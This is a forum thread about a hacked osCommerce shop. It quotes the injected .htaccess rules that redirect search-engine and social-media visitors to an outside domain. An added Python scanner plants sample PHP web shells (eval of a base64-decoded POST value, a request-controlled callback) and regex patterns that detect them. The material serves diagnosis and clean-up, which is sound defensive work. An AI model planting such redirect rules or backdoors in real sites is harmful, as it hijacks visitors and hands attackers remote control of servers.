nazs Posted October 4, 2011

Hi

Has anyone had this similar problem? I have asked my web host to restore my site to a healthy date (2 weeks ago) but I am still having the same problem. I don't see it in the English forum, but I googled it and found a similar issue with a German osCommerce member at http://forums.oscomm...showtopic=79859, which basically says:

=============
member1: Hmm, for a few days there has been a problem with my osCommerce online shop. Everything works perfectly except the search. When I search for items with the quick search function and then click, it constantly tries to forward to http://renamenetwork.ru and not to the articles in my shop. Which file is responsible for the quick search? There must be an entry for http://renamenetwork.ru in the PHP file; hopefully I can remove it...

member2: Hi, apparently you have been hacked and your shop contains malicious code. Greetings, Stefan
===============

Any pointers are greatly appreciated.

Naz
nazs (Author) Posted October 4, 2011

Problem solved. In case anyone is hit by the same nightmare, here is the solution: http://sucuri.net/malware/malware-entry-mwhta7

Naz
Taipo Posted October 5, 2011

Certainly removing the malware code from your .htaccess file will end the redirection attack, but it does not resolve the question of how the code got there in the first place.

Imagine you have a power tool stored in a shed, and someone is able to enter your shed and turn the power tool on because there are no locks on the door. Every day you go into your shed, the power tool is running. Obviously switching the power tool off at the wall is not really the solution but merely a temporary reprieve for your ears (and, of course, it may save you some electricity); the solution is to prevent the invader from getting into the shed in the first place.

To prevent further exploitation of the vulnerable code in out-of-date versions of osCommerce you will need to at least make these changes here, or consider installing the latest version of the osC_Sec addon/contribution. Also 'consider' either renaming the admin directory and/or installing HTTP Basic Authentication on that directory, as has become the standard practice for web systems with publicly accessible admin login pages.

- Stop osCommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: new security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
nazs (Author) Posted October 6, 2011

Hi Taipo

Thank you for your reply. I have just installed your osC_Sec contribution (osC_Sec 4.0[r8]) today. My admin has long been changed to something else. All was OK for almost an hour before I got attacked again. It's my .htaccess file that has been amended by that hack with the lines below:

```apache
ErrorDocument 400 http://marketingvillage.ru/advertising/index.php
ErrorDocument 401 http://marketingvillage.ru/advertising/index.php
ErrorDocument 403 http://marketingvillage.ru/advertising/index.php
ErrorDocument 404 http://marketingvillage.ru/advertising/index.php
ErrorDocument 500 http://marketingvillage.ru/advertising/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://marketingvillage.ru/advertising/index.php [R=301,L]
</IfModule>
ErrorDocument 400 http://marketingvillage.ru/advertising/index.php
ErrorDocument 401 http://marketingvillage.ru/advertising/index.php
ErrorDocument 403 http://marketingvillage.ru/advertising/index.php
ErrorDocument 404 http://marketingvillage.ru/advertising/index.php
ErrorDocument 500 http://marketingvillage.ru/advertising/index.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
RewriteRule ^(.*)$ http://marketingvillage.ru/advertising/index.php [R=301,L]
</IfModule>
```

I guess what's left now is to install HTTP Basic Authentication like you said. Thank you for your help. You are a STAR.

Naz
Taipo Posted October 6, 2011

Often this type of attack can reoccur because the code the attackers are using to append code to your site files is still in your website directories somewhere. Have you found and removed all the malware code from your site files? It is often in .php files in the image directory, or code added to files like cookie_usage.php, includes/languages/[yourlanguage]/cookie_usage.php and more. If there is still malicious code resident in files on your site, then there is not much any protection can do to prevent further attacks.
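As an added example (not code from the original posts, from osC_Sec or from Sucuri), here is a Python script that hunts for both artefacts this thread describes: the off-site ErrorDocument lines and referer-gated RewriteRule in .htaccess of the shape pasted above, and the resident PHP files Taipo points to (scripts dropped into the image directory, code appended to cookie_usage.php). The web root it scans, the .htaccess text, the `attacker.example` host (standing in for the redirect target in the post), the allow-listed `www.example-shop.test` domain and the payload patterns are all constructed assumptions for the example; the pattern list is a triage heuristic, not a complete signature set.

```python
"""Hunt for the two artefacts described in this thread: an .htaccess that sends
search-engine traffic and error pages to a foreign host, and the resident PHP
dropper that keeps rewriting it. Every file, host and path below is constructed."""
import re
import tempfile
from pathlib import Path

OWN_HOSTS = {"www.example-shop.test"}  # assumption: hosts the shop may redirect to
ERRORDOC_RE = re.compile(r"ErrorDocument\s+(\d{3})\s+(\S+)", re.I)
REWRITECOND_RE = re.compile(r"RewriteCond\s+(\S+)\s+(\S+)", re.I)
REWRITERULE_RE = re.compile(r"RewriteRule\s+(\S+)\s+(\S+)", re.I)
URL_RE = re.compile(r"^https?://([^/\s]+)", re.I)
# Heuristic payload shapes (eval of encoded blob, request-controlled callback,
# code that writes .htaccess). A starting list for triage, not a signature set.
SUSPICIOUS_PHP = [
    re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
    re.compile(r"(fopen|file_put_contents|fwrite)\s*\([^;]*\.htaccess", re.I),
]
PHP_SUFFIXES = {".php", ".phtml", ".php5"}
IMAGE_DIRS = {"images", "image", "img"}


def external_host(target):
    """Host of an absolute URL unless it is one of ours; None for local paths."""
    m = URL_RE.match(target)
    if not m:
        return None
    return None if m.group(1).lower() in OWN_HOSTS else m.group(1).lower()


def audit_htaccess(text):
    """Flag ErrorDocument/RewriteRule targets on foreign hosts; RewriteCond lines are
    held until the RewriteRule they gate, so referer-only redirects show as cloaked."""
    findings, pending_conds = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if m := ERRORDOC_RE.match(line):
            if host := external_host(m.group(2)):
                findings.append(("errordocument", int(m.group(1)), host))
        elif m := REWRITECOND_RE.match(line):
            pending_conds.append(m.group(1).upper())
        elif m := REWRITERULE_RE.match(line):
            if host := external_host(m.group(2)):
                kind = "referer-cloaked" if "%{HTTP_REFERER}" in pending_conds else "unconditional"
                findings.append(("rewrite", kind, host))
            pending_conds = []  # conditions only apply to the rule that follows them
    return findings


def scan_webroot(root):
    """Walk the web root for infected .htaccess, PHP under image dirs, and payload hits."""
    root, hits = Path(root), []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        if path.name == ".htaccess":
            for f in audit_htaccess(path.read_text(errors="replace")):
                hits.append((rel.as_posix(), "htaccess:" + ":".join(map(str, f))))
        elif path.suffix.lower() in PHP_SUFFIXES:
            if IMAGE_DIRS & {p.lower() for p in rel.parts[:-1]}:
                hits.append((rel.as_posix(), "php-in-image-dir"))
            text = path.read_text(errors="replace")
            for rx in SUSPICIOUS_PHP:
                if rx.search(text):
                    hits.append((rel.as_posix(), "pattern:" + rx.pattern))
                    break
    return hits


MALICIOUS_HTACCESS = """\
# Constructed after the rules quoted in the thread; attacker.example is a stand-in.
ErrorDocument 404 http://attacker.example/advertising/index.php
ErrorDocument 500 http://attacker.example/advertising/index.php
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.*
RewriteRule ^(.*)$ http://attacker.example/advertising/index.php [R=301,L]
</IfModule>
# Legitimate same-site redirect that must not be flagged
RewriteRule ^old/(.*)$ http://www.example-shop.test/new/$1 [R=301,L]
"""


def build_demo_site(base):
    """Constructed web root: infected .htaccess, dropper among the images, backdoor
    appended to cookie_usage.php, and one clean file for contrast."""
    base, lang = Path(base), Path(base) / "includes" / "languages" / "english"
    (base / "images").mkdir(parents=True, exist_ok=True)
    lang.mkdir(parents=True, exist_ok=True)
    (base / ".htaccess").write_text(MALICIOUS_HTACCESS)
    (base / "images" / "thumb.php").write_text("<?php eval(base64_decode($_POST['q'])); ?>")
    (lang / "cookie_usage.php").write_text("<?php\ndefine('HEADING_TITLE', 'Cookie Usage');\n"
                                           "$_REQUEST['cmd']($_REQUEST['arg']);\n")
    (base / "index.php").write_text("<?php require('includes/application_top.php');\n")
    return base


def run_demo():
    with tempfile.TemporaryDirectory() as tmp:
        return scan_webroot(build_demo_site(tmp))
```

Point `scan_webroot()` at a copy of the real document root rather than the live tree, and treat every hit as a lead to read by hand: the heuristics will miss an obfuscated dropper and can flag a legitimate plugin that builds callbacks from request data. Anything that survives a clean-up and reappears, as the .htaccess above did within an hour, means a file the scan did not catch is still writing it.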
nazs (Author) Posted October 7, 2011

Thank you Taipo. Never thought of that. Will do that as well.